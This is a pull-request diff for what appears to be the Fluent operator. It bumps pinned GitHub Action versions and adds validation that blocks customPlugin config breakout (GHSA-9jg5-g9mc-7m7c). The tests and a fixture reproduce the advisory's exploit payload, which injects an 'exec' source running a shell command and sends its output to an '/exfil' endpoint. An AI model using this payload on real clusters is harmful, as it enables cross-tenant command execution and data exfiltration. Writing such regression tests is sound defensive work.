### PR TITLE
Configure HTTP metrics and harden the operator deployment

### DIFF
--- a/.github/workflows/build-fluentbit-image.yaml
+++ b/.github/workflows/build-fluentbit-image.yaml
@@ -127,14 +127,14 @@ jobs:
           platforms: linux/amd64,linux/arm64
 
       - name: Login to GHCR
-        uses: docker/login-action@650006c6eb7dba73a995cc03b0b2d7f5ca915bee # v4.2.0
+        uses: docker/login-action@dbcb813823bdd20940b903addbd779551569679f # v4.6.0
         with:
           registry: ghcr.io
           username: ${{ github.actor }}
           password: ${{ secrets.GITHUB_TOKEN }}
 
       - name: Login to Docker Hub
-        uses: docker/login-action@650006c6eb7dba73a995cc03b0b2d7f5ca915bee # v4.2.0
+        uses: docker/login-action@dbcb813823bdd20940b903addbd779551569679f # v4.6.0
         with:
           registry: docker.io
           username: ${{ secrets.REGISTRY_USER }}
@@ -189,14 +189,14 @@ jobs:
           platforms: linux/amd64,linux/arm64
 
       - name: Login to GHCR
-        uses: docker/login-action@650006c6eb7dba73a995cc03b0b2d7f5ca915bee # v4.2.0
+        uses: docker/login-action@dbcb813823bdd20940b903addbd779551569679f # v4.6.0
         with:
           registry: ghcr.io
           username: ${{ github.actor }}
           password: ${{ secrets.GITHUB_TOKEN }}
 
       - name: Login to Docker Hub
-        uses: docker/login-action@650006c6eb7dba73a995cc03b0b2d7f5ca915bee # v4.2.0
+        uses: docker/login-action@dbcb813823bdd20940b903addbd779551569679f # v4.6.0
         with:
           registry: docker.io
           username: ${{ secrets.REGISTRY_USER }}
@@ -229,14 +229,14 @@ jobs:
     needs: [build, build-debug, build-tags]
     steps:
       - name: Login to GHCR
-        uses: docker/login-action@650006c6eb7dba73a995cc03b0b2d7f5ca915bee # v4.2.0
+        uses: docker/login-action@dbcb813823bdd20940b903addbd779551569679f # v4.6.0
         with:
           registry: ghcr.io
           username: ${{ github.actor }}
           password: ${{ secrets.GITHUB_TOKEN }}
 
       - name: Login to Docker Hub
-        uses: docker/login-action@650006c6eb7dba73a995cc03b0b2d7f5ca915bee # v4.2.0
+        uses: docker/login-action@dbcb813823bdd20940b903addbd779551569679f # v4.6.0
         with:
           registry: docker.io
           username: ${{ secrets.REGISTRY_USER }}

--- a/.github/workflows/build-fluentbit-image.yaml
+++ b/.github/workflows/build-fluentbit-image.yaml
@@ -28,7 +28,7 @@ jobs:
 
     steps:
       - name: Checkout code
-        uses: actions/checkout@9c091bb21b7c1c1d1991bb908d89e4e9dddfe3e0 # v7.0.0
+        uses: actions/checkout@3d3c42e5aac5ba805825da76410c181273ba90b1 # v7.0.1
         with:
           ref: ${{ github.ref }}
 
@@ -119,7 +119,7 @@ jobs:
           - runs-on: ubuntu-24.04-arm # Builds arm64 on arm64 hosts
             platform: linux/arm64
     steps:
-      - uses: actions/checkout@9c091bb21b7c1c1d1991bb908d89e4e9dddfe3e0 # v7.0.0
+      - uses: actions/checkout@3d3c42e5aac5ba805825da76410c181273ba90b1 # v7.0.1
 
       - name: Set up Docker Buildx
         uses: docker/setup-buildx-action@d7f5e7f509e45cec5c76c4d5afdd7de93d0b3df5 # v4.1.0
@@ -181,7 +181,7 @@ jobs:
           - runs-on: ubuntu-24.04-arm # Builds arm64 on arm64 hosts
             platform: linux/arm64
     steps:
-      - uses: actions/checkout@9c091bb21b7c1c1d1991bb908d89e4e9dddfe3e0 # v7.0.0
+      - uses: actions/checkout@3d3c42e5aac5ba805825da76410c181273ba90b1 # v7.0.1
 
       - name: Set up Docker Buildx
         uses: docker/setup-buildx-action@d7f5e7f509e45cec5c76c4d5afdd7de93d0b3df5 # v4.1.0

--- a/.github/workflows/build-fluentd-image.yaml
+++ b/.github/workflows/build-fluentd-image.yaml
@@ -19,7 +19,7 @@ jobs:
       VERSION: ${{ steps.get-version.outputs.VERSION }}
     steps:
       - name: Checkout code
-        uses: actions/checkout@9c091bb21b7c1c1d1991bb908d89e4e9dddfe3e0 # v7.0.0
+        uses: actions/checkout@3d3c42e5aac5ba805825da76410c181273ba90b1 # v7.0.1
         with:
           ref: ${{ github.ref }}
 
@@ -83,7 +83,7 @@ jobs:
           - runs-on: ubuntu-24.04-arm # Builds arm64 on arm64 hosts
             platform: linux/arm64
     steps:
-      - uses: actions/checkout@9c091bb21b7c1c1d1991bb908d89e4e9dddfe3e0 # v7.0.0
+      - uses: actions/checkout@3d3c42e5aac5ba805825da76410c181273ba90b1 # v7.0.1
 
       - name: Install Go
         id: setup-go

--- a/.github/workflows/build-fluentd-image.yaml
+++ b/.github/workflows/build-fluentd-image.yaml
@@ -98,14 +98,14 @@ jobs:
           platforms: linux/amd64,linux/arm64
 
       - name: Login to GHCR
-        uses: docker/login-action@650006c6eb7dba73a995cc03b0b2d7f5ca915bee # v4.2.0
+        uses: docker/login-action@dbcb813823bdd20940b903addbd779551569679f # v4.6.0
         with:
           registry: ghcr.io
           username: ${{ github.actor }}
           password: ${{ secrets.GITHUB_TOKEN }}
 
       - name: Login to Docker Hub
-        uses: docker/login-action@650006c6eb7dba73a995cc03b0b2d7f5ca915bee # v4.2.0
+        uses: docker/login-action@dbcb813823bdd20940b903addbd779551569679f # v4.6.0
         with:
           registry: docker.io
           username: ${{ secrets.REGISTRY_USER }}
@@ -155,14 +155,14 @@ jobs:
     needs: [build, determine-tags]
     steps:
       - name: Login to GHCR
-        uses: docker/login-action@650006c6eb7dba73a995cc03b0b2d7f5ca915bee # v4.2.0
+        uses: docker/login-action@dbcb813823bdd20940b903addbd779551569679f # v4.6.0
         with:
           registry: ghcr.io
           username: ${{ github.actor }}
           password: ${{ secrets.GITHUB_TOKEN }}
 
       - name: Login to Docker Hub
-        uses: docker/login-action@650006c6eb7dba73a995cc03b0b2d7f5ca915bee # v4.2.0
+        uses: docker/login-action@dbcb813823bdd20940b903addbd779551569679f # v4.6.0
         with:
           registry: docker.io
           username: ${{ secrets.REGISTRY_USER }}

--- a/.github/workflows/build-fluentd-image.yaml
+++ b/.github/workflows/build-fluentd-image.yaml
@@ -87,7 +87,7 @@ jobs:
 
       - name: Install Go
         id: setup-go
-        uses: actions/setup-go@924ae3a1cded613372ab5595356fb5720e22ba16 # v6.5.0
+        uses: actions/setup-go@b7ad1dad31e06c5925ef5d2fc7ad053ef454303e # v7.0.0
         with:
           go-version-file: go.mod
           cache-dependency-path: go.sum

--- a/.github/workflows/build-op-image.yaml
+++ b/.github/workflows/build-op-image.yaml
@@ -104,7 +104,7 @@ jobs:
 
       - name: Install Go
         id: setup-go
-        uses: actions/setup-go@924ae3a1cded613372ab5595356fb5720e22ba16 # v6.5.0
+        uses: actions/setup-go@b7ad1dad31e06c5925ef5d2fc7ad053ef454303e # v7.0.0
         with:
           go-version-file: go.mod
           cache-dependency-path: go.sum

--- a/.github/workflows/build-op-image.yaml
+++ b/.github/workflows/build-op-image.yaml
@@ -59,7 +59,7 @@ jobs:
 
     steps:
       - name: Checkout code
-        uses: actions/checkout@9c091bb21b7c1c1d1991bb908d89e4e9dddfe3e0 # v7.0.0
+        uses: actions/checkout@3d3c42e5aac5ba805825da76410c181273ba90b1 # v7.0.1
         with:
           ref: ${{ inputs.tag || github.ref }}
           fetch-depth: 1

--- a/.github/workflows/build-op-image.yaml
+++ b/.github/workflows/build-op-image.yaml
@@ -115,7 +115,7 @@ jobs:
           platforms: linux/amd64,linux/arm64
 
       - name: Login to GHCR
-        uses: docker/login-action@650006c6eb7dba73a995cc03b0b2d7f5ca915bee # v4.2.0
+        uses: docker/login-action@dbcb813823bdd20940b903addbd779551569679f # v4.6.0
         with:
           registry: ghcr.io
           username: ${{ github.actor }}
@@ -123,7 +123,7 @@ jobs:
 
       - name: Login to Docker Hub
         if: env.HAS_DOCKERHUB == 'true'
-        uses: docker/login-action@650006c6eb7dba73a995cc03b0b2d7f5ca915bee # v4.2.0
+        uses: docker/login-action@dbcb813823bdd20940b903addbd779551569679f # v4.6.0
         with:
           registry: docker.io
           username: ${{ secrets.REGISTRY_USER }}
@@ -174,7 +174,7 @@ jobs:
     needs: [build]
     steps:
       - name: Login to GHCR
-        uses: docker/login-action@650006c6eb7dba73a995cc03b0b2d7f5ca915bee # v4.2.0
+        uses: docker/login-action@dbcb813823bdd20940b903addbd779551569679f # v4.6.0
         with:
           registry: ghcr.io
           username: ${{ github.actor }}
@@ -182,7 +182,7 @@ jobs:
 
       - name: Login to Docker Hub
         if: env.HAS_DOCKERHUB == 'true'
-        uses: docker/login-action@650006c6eb7dba73a995cc03b0b2d7f5ca915bee # v4.2.0
+        uses: docker/login-action@dbcb813823bdd20940b903addbd779551569679f # v4.6.0
         with:
           registry: docker.io
           username: ${{ secrets.REGISTRY_USER }}

--- a/.github/workflows/bump-fluent-bit-version.yaml
+++ b/.github/workflows/bump-fluent-bit-version.yaml
@@ -13,7 +13,7 @@ jobs:
     runs-on: ubuntu-latest
     steps:
       - name: Checkout code
-        uses: actions/checkout@9c091bb21b7c1c1d1991bb908d89e4e9dddfe3e0 # v7.0.0
+        uses: actions/checkout@3d3c42e5aac5ba805825da76410c181273ba90b1 # v7.0.1
 
       - name: Validate version format
         run: |

--- a/.github/workflows/helm-ci.yaml
+++ b/.github/workflows/helm-ci.yaml
@@ -29,7 +29,7 @@ jobs:
 
     steps:
       - name: Checkout
-        uses: actions/checkout@9c091bb21b7c1c1d1991bb908d89e4e9dddfe3e0 # v7.0.0
+        uses: actions/checkout@3d3c42e5aac5ba805825da76410c181273ba90b1 # v7.0.1
         with:
           fetch-depth: 0
 

--- a/.github/workflows/helm-ci.yaml
+++ b/.github/workflows/helm-ci.yaml
@@ -34,7 +34,7 @@ jobs:
           fetch-depth: 0
 
       - name: Install Go
-        uses: actions/setup-go@924ae3a1cded613372ab5595356fb5720e22ba16 # v6.5.0
+        uses: actions/setup-go@b7ad1dad31e06c5925ef5d2fc7ad053ef454303e # v7.0.0
         with:
           go-version-file: go.mod
           cache-dependency-path: go.sum

--- a/.github/workflows/lint-test.yaml
+++ b/.github/workflows/lint-test.yaml
@@ -7,7 +7,7 @@ jobs:
     runs-on: ubuntu-latest
     steps:
       - name: Checkout
-        uses: actions/checkout@9c091bb21b7c1c1d1991bb908d89e4e9dddfe3e0 # v7.0.0
+        uses: actions/checkout@3d3c42e5aac5ba805825da76410c181273ba90b1 # v7.0.1
         with:
           fetch-depth: 0
 

--- a/.github/workflows/lint.yml
+++ b/.github/workflows/lint.yml
@@ -17,7 +17,7 @@ jobs:
         uses: actions/checkout@9c091bb21b7c1c1d1991bb908d89e4e9dddfe3e0 # v7.0.0
 
       - name: Setup Go
-        uses: actions/setup-go@924ae3a1cded613372ab5595356fb5720e22ba16 # v6.5.0
+        uses: actions/setup-go@b7ad1dad31e06c5925ef5d2fc7ad053ef454303e # v7.0.0
         with:
           go-version-file: go.mod
 

--- a/.github/workflows/lint.yml
+++ b/.github/workflows/lint.yml
@@ -14,7 +14,7 @@ jobs:
       contents: read
     steps:
       - name: Clone the code
-        uses: actions/checkout@9c091bb21b7c1c1d1991bb908d89e4e9dddfe3e0 # v7.0.0
+        uses: actions/checkout@3d3c42e5aac5ba805825da76410c181273ba90b1 # v7.0.1
 
       - name: Setup Go
         uses: actions/setup-go@b7ad1dad31e06c5925ef5d2fc7ad053ef454303e # v7.0.0
@@ -33,7 +33,7 @@ jobs:
       contents: read
     steps:
       - name: Checkout
-        uses: actions/checkout@9c091bb21b7c1c1d1991bb908d89e4e9dddfe3e0 # v7.0.0
+        uses: actions/checkout@3d3c42e5aac5ba805825da76410c181273ba90b1 # v7.0.1
 
       - name: Run actionlint
         uses: rhysd/actionlint@914e7df21a07ef503a81201c76d2b11c789d3fca # v1.7.12

--- a/.github/workflows/main.yaml
+++ b/.github/workflows/main.yaml
@@ -58,7 +58,7 @@ jobs:
           fetch-depth: 0
 
       - name: Install Go
-        uses: actions/setup-go@924ae3a1cded613372ab5595356fb5720e22ba16 # v6.5.0
+        uses: actions/setup-go@b7ad1dad31e06c5925ef5d2fc7ad053ef454303e # v7.0.0
         with:
           go-version-file: go.mod
           cache-dependency-path: go.sum
@@ -101,7 +101,7 @@ jobs:
           fetch-depth: 0
 
       - name: Install Go
-        uses: actions/setup-go@924ae3a1cded613372ab5595356fb5720e22ba16 # v6.5.0
+        uses: actions/setup-go@b7ad1dad31e06c5925ef5d2fc7ad053ef454303e # v7.0.0
         with:
           go-version-file: go.mod
           cache-dependency-path: go.sum
@@ -128,7 +128,7 @@ jobs:
           fetch-depth: 0
 
       - name: Install Go
-        uses: actions/setup-go@924ae3a1cded613372ab5595356fb5720e22ba16 # v6.5.0
+        uses: actions/setup-go@b7ad1dad31e06c5925ef5d2fc7ad053ef454303e # v7.0.0
         with:
           go-version-file: go.mod
           cache-dependency-path: go.sum

--- a/.github/workflows/main.yaml
+++ b/.github/workflows/main.yaml
@@ -53,7 +53,7 @@ jobs:
       GO111MODULE: "on"
     steps:
       - name: Checkout code
-        uses: actions/checkout@9c091bb21b7c1c1d1991bb908d89e4e9dddfe3e0 # v7.0.0
+        uses: actions/checkout@3d3c42e5aac5ba805825da76410c181273ba90b1 # v7.0.1
         with:
           fetch-depth: 0
 
@@ -96,7 +96,7 @@ jobs:
       GO111MODULE: "on"
     steps:
       - name: Checkout code
-        uses: actions/checkout@9c091bb21b7c1c1d1991bb908d89e4e9dddfe3e0 # v7.0.0
+        uses: actions/checkout@3d3c42e5aac5ba805825da76410c181273ba90b1 # v7.0.1
         with:
           fetch-depth: 0
 
@@ -123,7 +123,7 @@ jobs:
     name: Binary build
     steps:
       - name: Checkout code
-        uses: actions/checkout@9c091bb21b7c1c1d1991bb908d89e4e9dddfe3e0 # v7.0.0
+        uses: actions/checkout@3d3c42e5aac5ba805825da76410c181273ba90b1 # v7.0.1
         with:
           fetch-depth: 0
 

--- a/.github/workflows/pr-title-lint.yaml
+++ b/.github/workflows/pr-title-lint.yaml
@@ -28,7 +28,7 @@ jobs:
         env:
           GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
 
-      - uses: marocchino/sticky-pull-request-comment@0ea0beb66eb9baf113663a64ec522f60e49231c0 # v3.0.4
+      - uses: marocchino/sticky-pull-request-comment@5770ad5eb8f42dd2c4f34da00c94c5381e49af88 # v3.0.5
         if: always() && (steps.lint_pr_title.outputs.error_message != null)
         with:
           header: pr-title-lint-error
@@ -48,7 +48,7 @@ jobs:
             ${{ steps.lint_pr_title.outputs.error_message }}
             ```
 
-      - uses: marocchino/sticky-pull-request-comment@0ea0beb66eb9baf113663a64ec522f60e49231c0 # v3.0.4
+      - uses: marocchino/sticky-pull-request-comment@5770ad5eb8f42dd2c4f34da00c94c5381e49af88 # v3.0.5
         if: ${{ steps.lint_pr_title.outputs.error_message == null }}
         with:
           header: pr-title-lint-error

--- a/.github/workflows/release-please.yaml
+++ b/.github/workflows/release-please.yaml
@@ -30,7 +30,7 @@ jobs:
 
       - name: Checkout release tag
         if: ${{ steps.release.outputs.release_created }}
-        uses: actions/checkout@9c091bb21b7c1c1d1991bb908d89e4e9dddfe3e0 # v7.0.0
+        uses: actions/checkout@3d3c42e5aac5ba805825da76410c181273ba90b1 # v7.0.1
         with:
           ref: ${{ steps.release.outputs.tag_name }}
 

--- a/.github/workflows/renovate.yaml
+++ b/.github/workflows/renovate.yaml
@@ -21,7 +21,7 @@ jobs:
 
     steps:
       - name: Checkout
-        uses: actions/checkout@9c091bb21b7c1c1d1991bb908d89e4e9dddfe3e0 # v7.0.0
+        uses: actions/checkout@3d3c42e5aac5ba805825da76410c181273ba90b1 # v7.0.1
 
       - name: Self-hosted Renovate
         uses: renovatebot/github-action@973d3e5a68e735a444e8c03432b66eedb343c302 # v46.2.0

--- a/.github/workflows/renovate.yaml
+++ b/.github/workflows/renovate.yaml
@@ -24,7 +24,7 @@ jobs:
         uses: actions/checkout@9c091bb21b7c1c1d1991bb908d89e4e9dddfe3e0 # v7.0.0
 
       - name: Self-hosted Renovate
-        uses: renovatebot/github-action@dd5302ec17783b2fc721b19ae7209b57b1587765 # v46.1.17
+        uses: renovatebot/github-action@973d3e5a68e735a444e8c03432b66eedb343c302 # v46.2.0
         with:
           configurationFile: ".github/renovate-config.js"
           token: "${{ secrets.GITHUB_TOKEN }}"

--- a/.github/workflows/test-e2e.yml
+++ b/.github/workflows/test-e2e.yml
@@ -11,7 +11,7 @@ jobs:
     runs-on: ubuntu-latest
     steps:
       - name: Clone the code
-        uses: actions/checkout@9c091bb21b7c1c1d1991bb908d89e4e9dddfe3e0 # v7.0.0
+        uses: actions/checkout@3d3c42e5aac5ba805825da76410c181273ba90b1 # v7.0.1
 
       - name: Setup Go
         uses: actions/setup-go@b7ad1dad31e06c5925ef5d2fc7ad053ef454303e # v7.0.0

--- a/.github/workflows/test-e2e.yml
+++ b/.github/workflows/test-e2e.yml
@@ -14,7 +14,7 @@ jobs:
         uses: actions/checkout@9c091bb21b7c1c1d1991bb908d89e4e9dddfe3e0 # v7.0.0
 
       - name: Setup Go
-        uses: actions/setup-go@924ae3a1cded613372ab5595356fb5720e22ba16 # v6.5.0
+        uses: actions/setup-go@b7ad1dad31e06c5925ef5d2fc7ad053ef454303e # v7.0.0
         with:
           go-version-file: go.mod
           cache-dependency-path: go.sum

--- a/.github/workflows/test.yml
+++ b/.github/workflows/test.yml
@@ -13,7 +13,7 @@ jobs:
         uses: actions/checkout@9c091bb21b7c1c1d1991bb908d89e4e9dddfe3e0 # v7.0.0
 
       - name: Setup Go
-        uses: actions/setup-go@924ae3a1cded613372ab5595356fb5720e22ba16 # v6.5.0
+        uses: actions/setup-go@b7ad1dad31e06c5925ef5d2fc7ad053ef454303e # v7.0.0
         with:
           go-version-file: go.mod
 

--- a/.github/workflows/test.yml
+++ b/.github/workflows/test.yml
@@ -10,7 +10,7 @@ jobs:
     runs-on: ubuntu-latest
     steps:
       - name: Clone the code
-        uses: actions/checkout@9c091bb21b7c1c1d1991bb908d89e4e9dddfe3e0 # v7.0.0
+        uses: actions/checkout@3d3c42e5aac5ba805825da76410c181273ba90b1 # v7.0.1
 
       - name: Setup Go
         uses: actions/setup-go@b7ad1dad31e06c5925ef5d2fc7ad053ef454303e # v7.0.0

--- a/apis/fluentd/v1alpha1/plugins/custom/custom_types.go
+++ b/apis/fluentd/v1alpha1/plugins/custom/custom_types.go
@@ -18,9 +18,52 @@ func (c *CustomPlugin) Name() string {
 }
 
 func (c *CustomPlugin) Params(_ plugins.SecretLoader) (*params.PluginStore, error) {
+	if err := validateConfig(c.Config); err != nil {
+		return nil, err
+	}
 	ps := params.NewPluginStore("")
 	ps.Content = indentation(c.Config)
 	return ps, nil
+}
+
+// validateConfig ensures a customPlugin config snippet cannot break out of the
+// routing block it is rendered into. The text is written verbatim into the
+// shared Fluentd configuration, so a snippet whose directive blocks are not
+// self-contained could close its enclosing <label> and inject top-level
+// directives (e.g. an `@type exec` source) that execute in the shared
+// aggregator process (GHSA-9jg5-g9mc-7m7c). Merely indenting the text does not
+// prevent this because the Fluentd config grammar is whitespace-insensitive.
+//
+// We require the snippet's directive nesting to be self-contained: the depth may
+// never go negative (a closing tag with no matching opener would close the
+// surrounding block) and must return to zero at the end (a dangling opener would
+// otherwise swallow the sibling config that follows it).
+//
+// Only a tag that begins a line changes block nesting in the Fluentd config
+// grammar; angle brackets appearing inside parameter values do not, so those are
+// ignored to avoid rejecting legitimate configs.
+func validateConfig(config string) error {
+	depth := 0
+	for i, raw := range strings.Split(config, "\n") {
+		line := strings.TrimSpace(raw)
+		// Only a line-leading tag changes block nesting; blank lines, comments
+		// and parameter lines never begin with '<'.
+		if !strings.HasPrefix(line, "<") {
+			continue
+		}
+		if strings.HasPrefix(line, "</") {
+			depth--
+			if depth < 0 {
+				return fmt.Errorf("invalid customPlugin config: closing directive %q on line %d has no matching opening directive and would close the enclosing block", line, i+1)
+			}
+		} else {
+			depth++
+		}
+	}
+	if depth != 0 {
+		return fmt.Errorf("invalid customPlugin config: %d directive block(s) left unclosed; every opened block must be closed within the snippet", depth)
+	}
+	return nil
 }
 
 func indentation(config string) string {

--- a/apis/fluentd/v1alpha1/plugins/custom/custom_types_test.go
+++ b/apis/fluentd/v1alpha1/plugins/custom/custom_types_test.go
@@ -1,0 +1,154 @@
+package custom
+
+import (
+	"strings"
+	"testing"
+)
+
+// exploitPayload is the customPlugin config from GHSA-9jg5-g9mc-7m7c: it closes
+// the enclosing <label> block and injects a top-level `@type exec` source that
+// would run arbitrary commands in the shared aggregator.
+const exploitPayload = `<match **>
+  @type null
+</match>
+</label>
+<source>
+  @type exec
+  tag pwn.exec
+  @label @pwnexfil
+  command sh -c 'echo pwned'
+  run_interval 5s
+  <parse>
+    @type none
+  </parse>
+</source>
+<label @pwnexfil>
+  <match **>
+    @type http
+    endpoint http://listener.tenant-b.svc.cluster.local:8080/exfil
+  </match>
+</label>
+<label @pwnbalance>
+<match **>
+  @type null
+</match>`
+
+func TestValidateConfig_RejectsBreakout(t *testing.T) {
+	rejected := map[string]string{
+		"advisory exploit payload": exploitPayload,
+		"bare label close": `</label>
+<source>
+  @type exec
+</source>`,
+		"close before open": `</match>
+<match **>
+  @type null
+</match>`,
+		"extra close after balanced block": `<match **>
+  @type null
+</match>
+</label>`,
+	}
+
+	for name, cfg := range rejected {
+		t.Run(name, func(t *testing.T) {
+			if err := validateConfig(cfg); err == nil {
+				t.Fatalf("expected validateConfig to reject breakout config, got nil error")
+			}
+		})
+	}
+}
+
+func TestValidateConfig_RejectsUnclosedBlock(t *testing.T) {
+	unclosed := map[string]string{
+		"dangling source": `<source>
+  @type exec
+  command sh -c 'echo pwned'`,
+		"nested dangling": `<match **>
+  <buffer>
+    flush_interval 1s
+  </buffer>`,
+	}
+
+	for name, cfg := range unclosed {
+		t.Run(name, func(t *testing.T) {
+			if err := validateConfig(cfg); err == nil {
+				t.Fatalf("expected validateConfig to reject config with an unclosed block, got nil error")
+			}
+		})
+	}
+}
+
+func TestValidateConfig_AllowsLegitimate(t *testing.T) {
+	allowed := map[string]string{
+		"empty": "",
+		"balanced match block": `<match **>
+  @type opensearch
+  host opensearch-logging-data.svc
+  port 9200
+</match>`,
+		"plain directives only": `@type stdout
+log_level info`,
+		"nested balanced blocks": `<match **>
+  @type http
+  endpoint http://example.svc:8080/logs
+  <format>
+    @type json
+  </format>
+  <buffer>
+    flush_interval 1s
+  </buffer>
+</match>`,
+		"comments and blank lines": `# a leading comment
+<match **>
+
+  @type null
+  # trailing comment
+</match>`,
+		// Angle brackets inside a parameter value must not be mistaken for
+		// directive tags: only tags that begin a line change block nesting.
+		"angle brackets in value": `<filter **>
+  @type record_transformer
+  <record>
+    wrapped <b>value</b>
+  </record>
+</filter>`,
+	}
+
+	for name, cfg := range allowed {
+		t.Run(name, func(t *testing.T) {
+			if err := validateConfig(cfg); err != nil {
+				t.Fatalf("expected validateConfig to allow legitimate config, got error: %v", err)
+			}
+		})
+	}
+}
+
+func TestParams_RejectsBreakout(t *testing.T) {
+	c := &CustomPlugin{Config: exploitPayload}
+	ps, err := c.Params(nil)
+	if err == nil {
+		t.Fatalf("expected Params to reject breakout config, got nil error")
+	}
+	if ps != nil {
+		t.Fatalf("expected nil PluginStore on validation failure, got %+v", ps)
+	}
+	if !strings.Contains(err.Error(), "customPlugin") {
+		t.Fatalf("expected error to mention customPlugin, got: %v", err)
+	}
+}
+
+func TestParams_AllowsLegitimate(t *testing.T) {
+	c := &CustomPlugin{Config: `<match **>
+  @type opensearch
+  host opensearch-logging-data.svc
+  port 9200
+</match>`}
+	ps, err := c.Params(nil)
+	if err != nil {
+		t.Fatalf("expected Params to allow legitimate config, got error: %v", err)
+	}
+	if ps == nil || ps.Content == "" {
+		t.Fatalf("expected non-empty PluginStore content, got %+v", ps)
+	}
+}

--- a/apis/fluentd/v1alpha1/plugins/filter/types.go
+++ b/apis/fluentd/v1alpha1/plugins/filter/types.go
@@ -87,7 +87,7 @@ func (f *Filter) Params(loader plugins.SecretLoader) (*params.PluginStore, error
 		ps.InsertType(string(params.StdoutFilterType))
 		return f.stdoutPlugin(ps, loader), nil
 	}
-	return f.customFilter(ps, loader), nil
+	return f.customFilter(ps, loader)
 
 }
 
@@ -248,13 +248,16 @@ func (f *Filter) stdoutPlugin(parent *params.PluginStore, loader plugins.SecretL
 	return parent
 }
 
-func (f *Filter) customFilter(parent *params.PluginStore, loader plugins.SecretLoader) *params.PluginStore {
+func (f *Filter) customFilter(parent *params.PluginStore, loader plugins.SecretLoader) (*params.PluginStore, error) {
 	if f.CustomPlugin == nil {
-		return parent
+		return parent, nil
 	}
-	customPlugin, _ := f.CustomPlugin.Params(loader)
+	customPlugin, err := f.CustomPlugin.Params(loader)
+	if err != nil {
+		return nil, err
+	}
 	parent.Content = customPlugin.Content
-	return parent
+	return parent, nil
 }
 
 var _ plugins.Plugin = &Filter{}

--- a/apis/fluentd/v1alpha1/plugins/input/types.go
+++ b/apis/fluentd/v1alpha1/plugins/input/types.go
@@ -91,7 +91,10 @@ func (i *Input) Params(loader plugins.SecretLoader) (*params.PluginStore, error)
 	}
 
 	if i.CustomPlugin != nil {
-		customPs, _ := i.CustomPlugin.Params(loader)
+		customPs, err := i.CustomPlugin.Params(loader)
+		if err != nil {
+			return nil, err
+		}
 		ps.Content = customPs.Content
 		return ps, nil
 	}

--- a/apis/fluentd/v1alpha1/plugins/output/types.go
+++ b/apis/fluentd/v1alpha1/plugins/output/types.go
@@ -183,7 +183,7 @@ func (o *Output) Params(loader plugins.SecretLoader) (*params.PluginStore, error
 		return o.nullPlugin(ps, loader), nil
 	}
 
-	return o.customOutput(ps, loader), nil
+	return o.customOutput(ps, loader)
 }
 
 func (o *Output) forwardPlugin(parent *params.PluginStore, loader plugins.SecretLoader) *params.PluginStore {
@@ -811,13 +811,16 @@ func (o *Output) stdoutPlugin(parent *params.PluginStore, loader plugins.SecretL
 	return parent
 }
 
-func (o *Output) customOutput(parent *params.PluginStore, loader plugins.SecretLoader) *params.PluginStore {
+func (o *Output) customOutput(parent *params.PluginStore, loader plugins.SecretLoader) (*params.PluginStore, error) {
 	if o.CustomPlugin == nil {
-		return parent
+		return parent, nil
 	}
-	customPlugin, _ := o.CustomPlugin.Params(loader)
+	customPlugin, err := o.CustomPlugin.Params(loader)
+	if err != nil {
+		return nil, err
+	}
 	parent.Content = customPlugin.Content
-	return parent
+	return parent, nil
 }
 
 func (o *Output) datadogPlugin(parent *params.PluginStore, sl plugins.SecretLoader) *params.PluginStore {

--- a/apis/fluentd/v1alpha1/tests/helper_test.go
+++ b/apis/fluentd/v1alpha1/tests/helper_test.go
@@ -185,6 +185,35 @@ func Test_MixedCfgCopy1(t *testing.T) {
 	}
 }
 
+// Test_CustomPluginBreakoutRejected is a regression test for GHSA-9jg5-g9mc-7m7c.
+// A tenant Output whose customPlugin config tries to close its enclosing <label>
+// block and inject a top-level `@type exec` source must be rejected during
+// rendering so the malicious directives never reach the shared aggregator config.
+func Test_CustomPluginBreakoutRejected(t *testing.T) {
+	g := NewGomegaWithT(t)
+	sl := plugins.NewSecretLoader(nil, Fluentd.Namespace, logr.Logger{})
+
+	psr := fluentdv1alpha1.NewGlobalPluginResources("main")
+	psr.CombineGlobalInputsPlugins(sl, Fluentd.Spec.GlobalInputs)
+
+	_, err := psr.BuildCfgRouter(&FluentdConfig1)
+	g.Expect(err).NotTo(HaveOccurred())
+
+	cfgResources, errs := psr.PatchAndFilterNamespacedLevelResources(
+		sl,
+		FluentdConfig1.GetCfgId(),
+		[]fluentdv1alpha1.Input{},
+		[]fluentdv1alpha1.Filter{},
+		[]fluentdv1alpha1.Output{FluentdOutputCustomBreakout},
+	)
+
+	// The malicious output must surface a validation error and must not be
+	// rendered into the aggregated output plugins.
+	g.Expect(errs).NotTo(BeEmpty())
+	g.Expect(strings.Join(errs, "\n")).To(ContainSubstring("customPlugin"))
+	g.Expect(cfgResources.OutputPlugins).To(BeEmpty())
+}
+
 func Test_MixedCfgCopy2(t *testing.T) {
 	sl := plugins.NewSecretLoader(nil, Fluentd.Namespace, logr.Logger{})
 	testMixedConfigWithCopy(t, sl, Fluentd, &FluentdConfig2, []fluentdv1alpha1.Output{FluentdOutputMixedCopy2}, []fluentdv1alpha1.ClusterOutput{}, "./expected/fluentd-mixed-cfgs-output-copy-2.cfg")

--- a/apis/fluentd/v1alpha1/tests/tools.go
+++ b/apis/fluentd/v1alpha1/tests/tools.go
@@ -749,6 +749,40 @@ spec:
           logstash_prefix  ks-logstash-log
         </match>
 `
+	// FluentdOutputCustomBreakout reproduces GHSA-9jg5-g9mc-7m7c: a tenant Output
+	// whose customPlugin config closes its enclosing <label> block and injects a
+	// top-level `@type exec` source. It must be rejected during rendering.
+	FluentdOutputCustomBreakout    fluentdv1alpha1.Output
+	FluentdOutputCustomBreakoutRaw = `
+apiVersion: fluentd.fluent.io/v1alpha1
+kind: Output
+metadata:
+  name: fluentd-output-breakout
+  namespace: fluent
+  labels:
+    output.fluentd.fluent.io/enabled: "true"
+spec:
+  outputs:
+  - customPlugin:
+      config: |
+        <match **>
+          @type null
+        </match>
+        </label>
+        <source>
+          @type exec
+          tag pwn.exec
+          command sh -c 'echo pwned'
+          run_interval 5s
+          <parse>
+            @type none
+          </parse>
+        </source>
+        <label @pwnbalance>
+        <match **>
+          @type null
+        </match>
+`
 	FluentdOutputUser1    fluentdv1alpha1.Output
 	FluentdOutputUser1Raw = `
 apiVersion: fluentd.fluent.io/v1alpha1
@@ -1256,6 +1290,7 @@ func init() {
 			MustParseIntoObject(FluentdClusterOutput2LokiRaw, &FluentdClusterOutput2Loki)
 			MustParseIntoObject(FluentdClusterOutput2Loki1Raw, &FluentdClusterOutput2Loki1)
 			MustParseIntoObject(FluentdOutputUser1Raw, &FluentdOutputUser1)
+			MustParseIntoObject(FluentdOutputCustomBreakoutRaw, &FluentdOutputCustomBreakout)
